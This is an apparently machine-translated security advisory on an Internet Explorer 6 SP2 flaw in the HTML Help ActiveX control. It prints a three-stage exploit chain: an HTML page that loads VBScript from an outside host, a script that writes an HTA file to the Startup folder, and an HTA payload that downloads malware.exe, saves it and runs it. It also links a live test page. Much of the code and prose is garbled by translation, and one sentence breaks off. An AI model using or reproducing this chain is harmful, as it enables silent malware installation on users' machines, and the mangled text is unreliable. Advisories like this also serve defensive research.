Microsoft Internet Explorer SP2 Remote Arbitrary Command Execution Vulnerability

Affected Systems:

Microsoft Internet Explorer 6.0sp2

-Microsoft Windows XP Professional SP2

-Microsoft Windows XP Home SP2

Description:

Microsoft Internet Explorer is a popular Web browser.

Microsoft Internet Explorer combines multiple vulnerabilities, such as the Help ActiveX Control. Remote attackers can exploit this vulnerability to execute arbitrary files without user interaction, resulting in maliciousCodeRun.

Attackers can perform the following operations:

1. Create a Web page containing the following code:

sp2rc.htm
restart
classid = "CLSID: adb880a6-d8ff-11cf-9377-00aa003b7a11 "Height = 7% \
style =" position: absolute; top: 140; left: 72; Z-index: 100; "\
codebase =" hhctrl. OCX # version = 7%, 3790,1194 "width =" "> value =" related topics, menu ">

<Object ID = "inject" type = "application/X-oleobject "\

Classid = "CLSID: adb880a6-d8ff-11cf-9377-00aa003b7a11" Height = 7% \

Style = "position: absolute; top: 140; left: 72; Z-index: 100 ;"\

Codebase = "hhctrl. ocx # version = 5, 2, 3790,1194" width = "7%"> <Param name = "command "\

Value = "related topics, menu"> <Param name = "button" value = "text: Just a button">

<Param name = "window" value = "$ global_blank">

<Param name = "Item1" value = 'COMMAND; javascript: execScript ("document. Write (\" <SCRIPT \

Language =\\ "VBScript \\\"\

SRC =\\ "http://freehost07.websamba.com/greyhats/writehta.txt?#\" \ "+ String. fromcharcode \

(62) + \ "</Scr \" + \ "IPT \" + String. fromcharcode (62) ") '> </Object>

<SCRIPT>

Localpage. hhclick ();

SetTimeout ("inject. hhclick ()", 100 );

</SCRIPT>

---------------------------------------------------------------------

The first object (ID: localpage) tells hhctrl. OCX opens a help pop-up window to the c: \ windows \ pchealth \ helpctr \ System \ blurbs \ tools.htm location. Select this file because it is processed in this region. An error is displayed on some computers before the pop-up. This is the only opportunity for users to prevent this vulnerability.

The second object (ID: region is executed in unsafe regions.

In this script, hhclick is used to automate this vulnerability.

2. writehta.txt use ADODB recordset to write Microsoft Office. HTA to the User Startup Folder:

Writehta.txt

---------------------------------------------------------------------

Dim Conn, RS

Set conn = Createobject ("ADODB. Connection ")

Conn. Open "driver = {Microsoft text Driver (*. txt; *. CSV )};"&_

"DBQ = http://www.malware.com ;"&_

"Extensions = ASC, CSV, tab, txt ;"&_

"Persist Security info = false"

Dim SQL

SQL = "select * From foobar.txt"

Set rs = conn.exe cute (SQL)

Set rs = Createobject ("ADODB. recordset ")

Rs. Open "select * From foobar.txt", Conn

Rs. Save "C: \ Documents ents and Settings \ All Users \ Start Menu \ Programs \ Startup \ Microsoft \

Office. HTA ", adpersistxml Rs. Close

Conn. Close

Window. Close

---------------------------------------------------------------------

3. f00bar.txt is a file requested by ADODB recordset. Because there is no absolute limit on the HTA file, you can request and save the file to the user system to intrude into the target user:

F00bar.txt

---------------------------------------------------------------------

"Meaning less shit I had to put here"

"<Script language = VBScript> crap = """

": On Error resume next: Crap = """

": Set O = Createobject (" "msxml2.xmlhttp" "): Crap = """

": O. Open" "get" "," "http://freehost07.websamba.com/greyhats/malware.exe" ", false :\

Crap = ": O. Send: Crap = """

": Set S = Createobject (" "ADODB. Stream" "): Crap = """

"": S. type = 1: Crap = """

"": S. Open: Crap = """

": S. Write O. responsebody: Crap = """

": S. savetofile" "C: \ malware.exe" ", 2: Crap = """

": Set Ws = Createobject (" wscript. Shell ""): Crap = """

": Ws. Run" "C: \ malware.exe" ", 3, false: Crap = """

"</SCRIPT> crap = """

---------------------------------------------------------------------

Test method:

Alert

BelowProgram(Method) It may be offensive and only used for security research and teaching. Users are at your own risk!

Paul (paul@greyhats.cjb.net) provides the following test page:

Http://freehost07.websamba.com/greyhats/sp2rc.htm

Suggestion:

Vendor patch:

Microsoft

---------

Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.microsoft.com/windows/ie/default.asp